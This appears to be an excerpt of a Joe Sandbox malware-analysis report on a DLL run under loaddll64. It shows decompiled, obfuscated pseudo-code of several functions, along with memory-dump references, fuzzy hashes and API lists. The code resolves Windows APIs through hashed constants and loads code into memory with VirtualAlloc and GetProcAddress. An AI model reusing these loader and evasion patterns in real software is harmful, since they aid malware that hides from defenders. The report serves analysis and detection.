                                0x7ffc130ea784
                                0x7ffc130ea789
                                0x7ffc130ea7a8
                                0x7ffc130ea7b2
                                0x7ffc130ea7b8
                                0x7ffc130ea7bf
                                0x7ffc130ea7ca
                                0x7ffc130ea7f0
                                0x7ffc130ea7f3
                                0x7ffc130ea802
                                0x7ffc130ea807
                                0x7ffc130ea816
                                0x7ffc130ea81e
                                0x7ffc130ea824
                                0x7ffc130ea837
                                0x7ffc130ea842
                                0x7ffc130ea85d
                                0x7ffc130ea878
                                0x7ffc130ea87e
                                0x7ffc130ea883
                                0x7ffc130ea8a4
                                0x7ffc130ea8c6
                                0x7ffc130ea8da
                                0x7ffc130ea8e4
                                0x7ffc130ea8eb
                                0x7ffc130ea8ee
                                0x7ffc130ea8f2
                                0x7ffc130ea8f5
                                0x7ffc130ea8fd
                                0x7ffc130ea915
                                0x7ffc130ea919
                                0x7ffc130ea91d
                                0x7ffc130ea922
                                0x7ffc130ea928
                                0x7ffc130ea92d
                                0x7ffc130ea931
                                0x7ffc130ea936
                                0x7ffc130ea939
                                0x7ffc130ea965

                                APIs
                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFC130EA81E
                                  • Part of subcall function 00007FFC130E11F0: GetProcessHeap.KERNEL32 ref: 00007FFC130E1490
                                  • Part of subcall function 00007FFC130E11F0: HeapFree.KERNEL32 ref: 00007FFC130E14A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$CriticalEnterFreeProcessSection
                                • String ID:
                                • API String ID: 427202882-0
                                • Opcode ID: 06d21744d6bd25f7f01f7bf7974a9ca1116d3c96e03c2e6b9feebbf35e4aacf2
                                • Instruction ID: 78221295fa8c2ba37ba84bb2e190045f8c22a7c505b6ff4ee90f700e3c5fed37
                                • Opcode Fuzzy Hash: 06d21744d6bd25f7f01f7bf7974a9ca1116d3c96e03c2e6b9feebbf35e4aacf2
                                • Instruction Fuzzy Hash: 76B179732086D58AD721CF15E444BEEB7A8F788B48F414125EB8A17B58DB78EA95CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F9610 Relevance: 1.4, APIs: 1, Instructions: 138COMMON
                                Download Yara Rule
                                C-Code - Quality: 71%
                                			E00007FFC7FFC130F9610(signed int __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, long long __r12, long long __r13, long long __r14, long long __r15, long long _a8, signed int _a16, signed int _a32, signed int _a40, signed int _a64, signed int* _a72, signed int _a80, signed int _a96) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				signed int _v64;
				signed int _v72;
				signed int _v80;
				signed int _v88;
				signed int* _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				signed int _v128;
				signed int _v136;
				void* __rsi;
				void* __rbp;
				signed int _t84;
				signed int _t88;
				signed int _t98;
				signed int _t103;
				signed int _t107;
				signed int _t117;
				signed int* _t124;
				signed long long _t129;
				void* _t135;
				void* _t136;
				void* _t137;

				_t117 = __rax;
				_t88 = __r9 - 0xefd;
				r8d = _a80;
				_t98 = __rdx - 0x3189;
				r8d = r8d + 0xaeb;
				_t103 = _a64 + 0xffffeb3f;
				_a16 = _t98;
				r10d = __rax - 0xbf1;
				_a64 = _t103;
				_t107 = __rax + 0x8d0;
				_a80 = r10d;
				_a96 = _t107;
				_a32 = __r9 - 0x1086;
				_a40 = _t88;
				if (_t88 == __r10 + 0x216) goto 0x130f98d3;
				_a8 = __rbx;
				_t124 = _a72;
				if (_t103 - __r10 + 0x114f >= 0) goto 0x130f9723;
				_v128 = 0x3189;
				r9d = 0x3a59;
				_v136 = 0x36e7;
				r8d = 0x2032;
				E00007FFC7FFC130E9AC0(_t124, __rcx, _t124, _t137); // executed
				_t124[0xdc] = _t117;
				_t124[0xcf] = 0;
				_t124[0x24] =  &(_t124[0x78]);
				 *((intOrPtr*)(_t124[0xc] + 0x100)) =  *((intOrPtr*)(_t124[0xc] + 0x100)) + _t124[0x44];
				_t124[0x44] = _t124[0x44] - 1;
				goto 0x130f98b8;
				_v40 = __r13;
				_t129 =  *_t124 | _t98;
				if (_t124[0x54] != _t129) goto 0x130f98cb;
				_v32 = __r12;
				_v48 = __r14;
				_v56 = __r15;
				asm("o16 nop [eax+eax]");
				if (r8d - _t129 < 0) goto 0x130f987f;
				LeaveCriticalSection(??);
				r12d = _t124[0x32];
				r8d = r12d;
				_t84 = _a32;
				r8d = r8d & _t107;
				r9d = _t124[0x74];
				r11d = _t124[0x68];
				r9d = r9d | _t103;
				r11d = r11d | _t124[0x50];
				r12d = r12d ^ 0x00001f2c;
				r10d = _a64;
				r12d = r12d - _t84;
				r10d = r10d | 0x00002032;
				r11d = r11d - _t124[0x1e];
				r14d = _t124[0x78];
				r10d = r10d & _a80;
				r14d = r14d | _t84;
				r15d =  *_t124;
				r15d = r15d - _t124[0x16];
				r15d = r15d - 0x2103;
				_v64 = r11d;
				_v72 = r12d;
				_v80 = _t124[0x8a] ^ 0x00003666;
				_v88 = r10d;
				_v96 = _t124;
				_v104 = _t124[0x10] - r12d;
				_v112 = _t84 + 0x38e9;
				_v120 = _t124[0x54] * _a40 - _a96;
				_v128 = r14d;
				_v136 = r15d;
				r8d = E00007FFC7FFC130EA4F0(r8d, _t124, _t129, _t124, _t136, __r8, __r9);
				_a80 = _a80 + _t124[0x1e] + _a96;
				r13d = r13d + 3;
				if (r13d == ( *_t124 | _a16)) goto 0x130f9760;
				return _t135 + 0x2103;
			}






























                                0x7ffc130f9610
                                0x7ffc130f9622
                                0x7ffc130f9629
                                0x7ffc130f9631
                                0x7ffc130f963e
                                0x7ffc130f9645
                                0x7ffc130f964b
                                0x7ffc130f9652
                                0x7ffc130f9659
                                0x7ffc130f9660
                                0x7ffc130f9666
                                0x7ffc130f9675
                                0x7ffc130f967c
                                0x7ffc130f968a
                                0x7ffc130f9693
                                0x7ffc130f96a0
                                0x7ffc130f96a8
                                0x7ffc130f96b2
                                0x7ffc130f96b9
                                0x7ffc130f96c2
                                0x7ffc130f96c8
                                0x7ffc130f96cd
                                0x7ffc130f96db
                                0x7ffc130f96e0
                                0x7ffc130f96ee
                                0x7ffc130f96fc
                                0x7ffc130f970a
                                0x7ffc130f9717
                                0x7ffc130f971e
                                0x7ffc130f9729
                                0x7ffc130f9731
                                0x7ffc130f973e
                                0x7ffc130f9744
                                0x7ffc130f974c
                                0x7ffc130f9751
                                0x7ffc130f9756
                                0x7ffc130f9772
                                0x7ffc130f9778
                                0x7ffc130f977e
                                0x7ffc130f9785
                                0x7ffc130f9788
                                0x7ffc130f978f
                                0x7ffc130f9792
                                0x7ffc130f9799
                                0x7ffc130f97a0
                                0x7ffc130f97af
                                0x7ffc130f97be
                                0x7ffc130f97c5
                                0x7ffc130f97cd
                                0x7ffc130f97d6
                                0x7ffc130f97dd
                                0x7ffc130f97e7
                                0x7ffc130f97ee
                                0x7ffc130f97f6
                                0x7ffc130f97f9
                                0x7ffc130f9801
                                0x7ffc130f980c
                                0x7ffc130f9821
                                0x7ffc130f9826
                                0x7ffc130f982b
                                0x7ffc130f982f
                                0x7ffc130f983b
                                0x7ffc130f9840
                                0x7ffc130f9844
                                0x7ffc130f9848
                                0x7ffc130f984c
                                0x7ffc130f9851
                                0x7ffc130f985e
                                0x7ffc130f986a
                                0x7ffc130f9882
                                0x7ffc130f9892
                                0x7ffc130f98ca

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CriticalLeaveSection
                                • String ID:
                                • API String ID: 3988221542-0
                                • Opcode ID: 4c7c26e474c2be739ad3d1bd9dd664af0724ce0dccd55edf23a61f10c074f1d5
                                • Instruction ID: ff27112cde60e09469b74aa2727b065e55600586ecd25aeb54ebdbcb6788062f
                                • Opcode Fuzzy Hash: 4c7c26e474c2be739ad3d1bd9dd664af0724ce0dccd55edf23a61f10c074f1d5
                                • Instruction Fuzzy Hash: 616144736086C58BE361CF25E4407DAB7A8F788B48F044139DB8957B58EB38E9A4CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00007FFC130E4C80 Relevance: 19.8, APIs: 9, Strings: 2, Instructions: 565filelibrarymemoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 76%
                                			E00007FFC7FFC130E4C80() {
				intOrPtr _t88;
				void* _t111;
				void* _t120;
				long long _t131;
				intOrPtr _t139;
				long long _t141;
				intOrPtr* _t142;
				void* _t143;
				intOrPtr _t146;
				intOrPtr _t149;
				void* _t151;
				void* _t156;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t162;
				intOrPtr _t163;
				void* _t166;
				long long _t167;
				signed long long _t168;
				int _t169;
				long _t171;
				void* _t172;
				struct HINSTANCE__* _t173;

				 *((long long*)(_t160 + 0x20)) = _t141;
				_t161 = _t160 - 0x90;
				r9d =  *((intOrPtr*)(_t161 + 0xf8));
				r10d = _t162 - 0x1f2c;
				 *((intOrPtr*)(_t161 + 0xe0)) = _t151 + 0xe49;
				_t9 = _t143 + 0x18b5; // 0x37e1
				r14d = _t9;
				r11d = _t120 - 0x927;
				 *((intOrPtr*)(_t161 + 0xd0)) = r10d;
				r13d = _t120 - 0x11a9;
				 *((intOrPtr*)(_t161 + 0xd8)) = _t162 + 0x1669;
				r15d = _t120 - 0x30d5;
				 *((intOrPtr*)(_t161 + 0xf8)) = _t162 + 0x360;
				 *((intOrPtr*)(_t161 + 0x80)) = _t166 - 0x1b2d;
				 *((intOrPtr*)(_t161 + 0x110)) =  *((intOrPtr*)(_t161 + 0x118)) + 0xfa;
				r8d = _t151 + 0x522;
				 *((intOrPtr*)(_t161 + 0x118)) = _t166 - 0x1a27;
				if (r11d - _t141 + 0x354 > 0) goto 0x130e55e4;
				_t142 =  *((intOrPtr*)(_t161 + 0x120));
				if (r8d == _t159 + 0x1408) goto 0x130e5576;
				r8d = 0x36e7;
				 *( *((intOrPtr*)(_t142 + 0x248)) + 4) =  *(_t142 + 0x130) ^ 0x506c4282;
				 *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x248)) + 8)) =  *((intOrPtr*)( *_t142 + 0xb0)) + 0x657447bf;
				 *( *((intOrPtr*)(_t142 + 0x248)) + 0xc) =  *( *((intOrPtr*)(_t142 + 0x1c8)) + 0x130) ^ 0x00005794;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x1a0)) + 0x130)) + 0x12f0 == r8d) goto 0x130e4e0d;
				r8d = r8d + 1;
				 *( *((intOrPtr*)(_t142 + 0x40)) + 0x198) =  *( *((intOrPtr*)(_t142 + 0x40)) + 0x198) ^  *(_t142 + 0xc8) ^ 0x000030d5;
				_t131 = r8d;
				if (_t131 != _t151) goto 0x130e4dd0;
				GetProcAddress(_t173);
				_t163 =  *((intOrPtr*)(_t142 + 0xc0));
				r10d = 0x3666;
				 *((long long*)(_t142 + 0x1d8)) = _t131;
				 *(_t142 + 0x28) =  *(_t142 + 0x1f8) ^ _t168;
				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x118)) + 0x88 +  *(_t142 + 0x268) * 8));
				_t167 = _t166 + _t163;
				 *((long long*)(_t142 + 0x2b0)) = _t167;
				if (_t167 == _t163) goto 0x130e50e2;
				_t146 =  *_t142;
				 *((long long*)(_t142 + 0x18)) =  *((intOrPtr*)(_t146 + 0x120)) - 0x27ae;
				_t60 = _t146 - 0x2598; // -4517
				 *(_t142 + 0x70) =  *(_t142 + 0x70) | _t60;
				_t139 =  *((intOrPtr*)(_t142 + 0x1a0));
				_t65 = _t146 + 4; // 0x4
				r9d = _t65;
				r8d =  *(_t139 + 0x130) * 0x38dc7000;
				VirtualAlloc(_t172, _t171);
				if (_t139 == 0) goto 0x130e50e2;
				E00007FFC7FFC130EBFF0(0, _t151 + 0xe49, _t166 - 0x1b2d, _t111, _t139,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x2b0)))), _t139, _t158,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x2b0)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x2b0)))));
				 *((long long*)(_t142 + 0x1e0)) = 0x3cfb;
				_t88 =  *((intOrPtr*)(_t142 + 0x2b8))(_t156, _t158, _t159);
				_t149 =  *((intOrPtr*)(_t142 + 0x1c8));
				 *((intOrPtr*)(_t142 + 0x2c0)) = _t88;
				if (_t88 !=  *((intOrPtr*)(_t149 + 0x150)) - 0x23f8) goto 0x130e4f46;
				 *((long long*)(_t142 + 0xa0)) = 0;
				 *(_t142 + 0x10) =  *(_t142 + 0x10) | _t149 + 0x000030d5;
				ExitProcess(_t169);
			}




























                                0x7ffc130e4c80
                                0x7ffc130e4c90
                                0x7ffc130e4ca5
                                0x7ffc130e4cad
                                0x7ffc130e4cc2
                                0x7ffc130e4cc9
                                0x7ffc130e4cc9
                                0x7ffc130e4cd0
                                0x7ffc130e4cd7
                                0x7ffc130e4cdf
                                0x7ffc130e4ce6
                                0x7ffc130e4ced
                                0x7ffc130e4cfb
                                0x7ffc130e4d1c
                                0x7ffc130e4d23
                                0x7ffc130e4d2a
                                0x7ffc130e4d37
                                0x7ffc130e4d41
                                0x7ffc130e4d47
                                0x7ffc130e4d58
                                0x7ffc130e4d65
                                0x7ffc130e4d77
                                0x7ffc130e4d90
                                0x7ffc130e4dad
                                0x7ffc130e4dc6
                                0x7ffc130e4dd4
                                0x7ffc130e4deb
                                0x7ffc130e4e05
                                0x7ffc130e4e0b
                                0x7ffc130e4e1b
                                0x7ffc130e4e21
                                0x7ffc130e4e28
                                0x7ffc130e4e2e
                                0x7ffc130e4e3f
                                0x7ffc130e4e5d
                                0x7ffc130e4e65
                                0x7ffc130e4e68
                                0x7ffc130e4e72
                                0x7ffc130e4e78
                                0x7ffc130e4e88
                                0x7ffc130e4e8c
                                0x7ffc130e4e93
                                0x7ffc130e4e9d
                                0x7ffc130e4ea7
                                0x7ffc130e4ea7
                                0x7ffc130e4eab
                                0x7ffc130e4eb6
                                0x7ffc130e4ec2
                                0x7ffc130e4edc
                                0x7ffc130e4ee1
                                0x7ffc130e4eec
                                0x7ffc130e4ef2
                                0x7ffc130e4ef9
                                0x7ffc130e4f0d
                                0x7ffc130e4f0f
                                0x7ffc130e4f2f
                                0x7ffc130e4f3f

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: File$AddressAllocExitLockNamedPeekPipeProcProcessVirtual
                                • String ID: 6$662
                                • API String ID: 1002299123-1739385493
                                • Opcode ID: 61df2113f86e00cbc328842b638f91bd404d7e04f205a54db81927e6c79994c6
                                • Instruction ID: 010ea19b4cb679e23e49d4b22239f9463e74c26198d5082d6ccf0d305458cb2d
                                • Opcode Fuzzy Hash: 61df2113f86e00cbc328842b638f91bd404d7e04f205a54db81927e6c79994c6
                                • Instruction Fuzzy Hash: D2626372605A88C6EB55CF29E4987E933A8F788B9CF05453ACE4D5B398DF38D550CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C6DF0 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 303memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 39%
                                			E00000201201640C6DF0(long long __rbx, intOrPtr* __rcx, long long __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t96;
				void* _t116;
				void* _t121;
				intOrPtr _t123;
				void* _t130;
				char _t131;
				void* _t156;
				long long* _t198;
				long long* _t199;
				long long* _t201;
				char* _t218;
				char* _t219;
				long _t252;
				intOrPtr* _t253;
				long _t255;
				void* _t260;
				char* _t262;
				long long _t263;
				signed long long _t269;
				void* _t271;
				void* _t272;
				void* _t292;
				void* _t293;
				long _t300;
				long _t305;
				void* _t307;

				_t292 = _t271;
				 *((long long*)(_t292 + 8)) = __rbx;
				 *((long long*)(_t292 + 0x10)) = __rdx;
				_t272 = _t271 - 0x40;
				r14d =  *0x640cd450;
				_t253 = __rcx;
				 *((long long*)(_t272 + 0x38)) =  *((intOrPtr*)( *0x640cd458 + 8));
				if (E00000201201640C91C8(_t121, r14d ^ 0x55e7ce26,  *((intOrPtr*)( *0x640cd458 + 8)), __rbx, __rdx, __rdx, __rcx, _t255, _t292 - 0x58, _t292 + 0x18, _t292) != 0) goto 0x640c7239;
				_t198 =  *_t253;
				 *((long long*)(_t272 + 0x98)) = _t198;
				 *((long long*)(_t272 + 0x30)) =  *((intOrPtr*)( *0x640cd458 + 8));
				if ( *((intOrPtr*)(_t272 + 0x20)) == 0) goto 0x640c703b;
				r13d = 0xfb849f8f;
				E00000201201640C908C(r13d, _t198,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t198 == 0) goto 0x640c6e8f;
				 *_t198();
				goto 0x640c6e91;
				r8d = 1;
				HeapAlloc(_t307, _t305, _t300);
				 *((long long*)(_t272 + 0x28)) = _t198;
				if (_t198 == 0) goto 0x640c722f;
				0x640c47b0();
				_t262 = _t198;
				if ( *_t262 == 0x20) goto 0x640c6edc;
				if ( *_t262 != 9) goto 0x640c6ee1;
				_t263 = _t262 + 1;
				goto 0x640c6ed0;
				if ( *_t263 == 0) goto 0x640c6f74;
				E00000201201640C908C(r13d, _t198,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t198 == 0) goto 0x640c6f03;
				 *_t198();
				goto 0x640c6f05;
				asm("cdq");
				_t15 = _t198 + 1; // 0x1
				r8d = _t15;
				HeapAlloc(_t293, _t252, _t255);
				if (_t198 == 0) goto 0x640c6f76;
				_t130 =  *_t263;
				if (_t130 == 0) goto 0x640c6f46;
				if (_t130 == 0x20) goto 0x640c6f42;
				_t218 = _t263 + 1;
				_t131 =  *_t218;
				if (_t131 != 0) goto 0x640c6f34;
				if (_t131 != 0) goto 0x640c6f48;
				if (_t218 == 0) goto 0x640c6f62;
				 *_t218 = 0;
				_t219 = _t218 + 1;
				if ( *_t219 == 0x20) goto 0x640c6f5d;
				if ( *_t219 != 9) goto 0x640c6f62;
				goto 0x640c6f53;
				 *_t198 = _t263;
				_t199 = _t198 +  *((intOrPtr*)( *0x640cd458 + 8));
				if (_t219 + 1 != 0) goto 0x640c6f2a;
				goto 0x640c6f7e;
				if (0 == 0) goto 0x640c7021;
				E00000201201640C908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x640cd458 + 0x10)));
				if (_t199 == 0) goto 0x640c6fa8;
				 *_t199();
				 *((long long*)(_t253 + 0x40)) =  *((intOrPtr*)(_t272 + 0x28));
				 *((long long*)(_t253 + 0x48)) =  *((intOrPtr*)(_t272 + 0x90));
				 *((intOrPtr*)(_t253 + 0x50)) = sil;
				if ( *((char*)(_t253 + 0x70)) == 0) goto 0x640c6fcb;
				 *((char*)(_t253 + 0x70)) = 0;
				asm("lock and dword [edi+0x2c], 0xfffffffe");
				E00000201201640C908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0x640cd458 + 0x10)));
				if (_t199 == 0) goto 0x640c6fea;
				 *_t199();
				if ( *((intOrPtr*)(_t253 + 0x40)) == 0) goto 0x640c7010;
				HeapFree(_t260, ??);
				HeapFree(??, ??, ??);
				goto 0x640c7040;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				if (0x57 != 0) goto 0x640c723e;
				if (E00000201201640C91C8(0, r14d ^ 0x881e33f6, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x640c7239;
				_t96 = E00000201201640C672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98);
				_t123 =  *((intOrPtr*)(_t272 + 0x98));
				if (_t96 != 0) goto 0x640c70a8;
				if (_t123 == 0) goto 0x640c7239;
				 *((intOrPtr*)(_t253 + 0x28)) = _t123;
				if (E00000201201640C91C8(_t123, r14d ^ 0xa2dd2342, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x640c7166;
				_t46 = _t199 + 0x10; // 0x10
				_t116 = _t46;
				_t156 =  <  ?  *((void*)(_t272 + 0x90)) : _t116;
				E00000201201640C908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x640cd458 + 0x10)));
				if (_t199 == 0) goto 0x640c7109;
				 *_t199();
				r8d = _t156;
				0x640c47b0();
				if (_t156 - _t116 >= 0) goto 0x640c7134;
				r8d = _t116 - _t156;
				E00000201201640C487A();
				E00000201201640C908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0x640cd458 + 0x10)));
				if (_t199 == 0) goto 0x640c714e;
				 *_t199();
				HeapFree(??, ??, ??);
				_t269 =  *((intOrPtr*)(_t272 + 0x88));
				r14d = r14d ^ 0x1a1a0866;
				if (E00000201201640C91C8(_t123, r14d, _t199,  *((intOrPtr*)(_t272 + 0x30)), _t269,  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x640c723e;
				if (E00000201201640C672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98) == 0) goto 0x640c723e;
				if ( *((intOrPtr*)(_t272 + 0x98)) == 0) goto 0x640c723e;
				E00000201201640C908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x640cd458 + 0x10)));
				if (_t199 == 0) goto 0x640c71de;
				 *_t199();
				E00000201201640C908C(0x9c66d81c, _t199,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t199 == 0) goto 0x640c71f8;
				 *_t199();
				_t201 =  *((intOrPtr*)(_t272 + 0x28)) + _t269 * 0x23c34600;
				 *((long long*)(_t272 + 0x28)) = _t201;
				 *((long long*)(_t253 + 0x30)) = _t201;
				E00000201201640C908C(0x8d72aad2, _t201,  *((intOrPtr*)( *0x640cd458 + 0x10)));
				if (_t201 == 0) goto 0x640c723e;
				 *_t201();
				goto 0x640c723e;
				goto 0x640c7040;
				return 1;
			}
































                                0x201640c6df0
                                0x201640c6df3
                                0x201640c6df7
                                0x201640c6e06
                                0x201640c6e11
                                0x201640c6e22
                                0x201640c6e36
                                0x201640c6e42
                                0x201640c6e54
                                0x201640c6e5b
                                0x201640c6e63
                                0x201640c6e6b
                                0x201640c6e75
                                0x201640c6e7e
                                0x201640c6e86
                                0x201640c6e8b
                                0x201640c6e8d
                                0x201640c6e98
                                0x201640c6e9d
                                0x201640c6ea6
                                0x201640c6eae
                                0x201640c6ebd
                                0x201640c6ec9
                                0x201640c6ed4
                                0x201640c6eda
                                0x201640c6edc
                                0x201640c6edf
                                0x201640c6ee5
                                0x201640c6ef2
                                0x201640c6efa
                                0x201640c6eff
                                0x201640c6f01
                                0x201640c6f05
                                0x201640c6f0f
                                0x201640c6f0f
                                0x201640c6f17
                                0x201640c6f25
                                0x201640c6f2a
                                0x201640c6f32
                                0x201640c6f37
                                0x201640c6f39
                                0x201640c6f3c
                                0x201640c6f40
                                0x201640c6f44
                                0x201640c6f4b
                                0x201640c6f4d
                                0x201640c6f50
                                0x201640c6f56
                                0x201640c6f5b
                                0x201640c6f60
                                0x201640c6f62
                                0x201640c6f67
                                0x201640c6f70
                                0x201640c6f72
                                0x201640c6f80
                                0x201640c6f8f
                                0x201640c6f9f
                                0x201640c6fa6
                                0x201640c6fb5
                                0x201640c6fb9
                                0x201640c6fbd
                                0x201640c6fc5
                                0x201640c6fc7
                                0x201640c6fcb
                                0x201640c6fd9
                                0x201640c6fe1
                                0x201640c6fe8
                                0x201640c6fed
                                0x201640c6ffc
                                0x201640c700a
                                0x201640c701f
                                0x201640c702d
                                0x201640c704d
                                0x201640c7055
                                0x201640c707b
                                0x201640c7090
                                0x201640c7095
                                0x201640c709e
                                0x201640c70a2
                                0x201640c70ab
                                0x201640c70cb
                                0x201640c70db
                                0x201640c70db
                                0x201640c70eb
                                0x201640c70f8
                                0x201640c7100
                                0x201640c7107
                                0x201640c7112
                                0x201640c7117
                                0x201640c711e
                                0x201640c712c
                                0x201640c712f
                                0x201640c713d
                                0x201640c7145
                                0x201640c714c
                                0x201640c7158
                                0x201640c715e
                                0x201640c7166
                                0x201640c7189
                                0x201640c71a5
                                0x201640c71b4
                                0x201640c71cd
                                0x201640c71d5
                                0x201640c71dc
                                0x201640c71e7
                                0x201640c71ef
                                0x201640c71f6
                                0x201640c720c
                                0x201640c720f
                                0x201640c7214
                                0x201640c721c
                                0x201640c7224
                                0x201640c722b
                                0x201640c722d
                                0x201640c7234
                                0x201640c7257

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID: uJ$uJ$uJ
                                • API String ID: 1659099196-303439786
                                • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction ID: 6bfac28fa50306e3b406ec3ddd69d9d628bb80908c4ee56f6c1f27e36c3bbc14
                                • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction Fuzzy Hash: 42C185222047A1C7EB70DB62E8493EA6798FB88784F584425BF4D4379BDF3AC466C744
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C5638 Relevance: 11.5, APIs: 9, Instructions: 252memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 15%
                                			E00000201201640C5638(long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r11) {
				void* __rbp;
				signed long long _t89;
				signed long long _t109;
				signed long long _t122;
				signed long long _t131;
				intOrPtr _t141;
				void* _t167;
				void* _t186;
				long long* _t187;
				long long _t188;
				long long _t190;
				long long _t192;
				long long* _t193;
				long long* _t234;
				long _t237;
				long _t240;
				void* _t243;
				void* _t248;
				void* _t249;
				void* _t264;
				void* _t269;
				void* _t270;
				long _t273;
				long _t277;
				void* _t281;

				_t269 = __r11;
				_t192 = __rbx;
				_t186 = _t248;
				 *((long long*)(_t186 + 0x10)) = __rbx;
				 *((intOrPtr*)(_t186 + 0x20)) = r9d;
				 *((long long*)(_t186 + 0x18)) = __r8;
				 *((long long*)(_t186 + 8)) = __rcx;
				_t249 = _t248 - 0x50;
				_t244 =  *0x640cd458;
				_t187 =  *0x640cd448;
				 *((long long*)(_t249 + 0x38)) = _t187;
				E00000201201640C908C(0x38e683e4, _t187,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t187 == _t237) goto 0x640c5691;
				_t9 = _t237 + 0xa; // 0xa
				 *_t187();
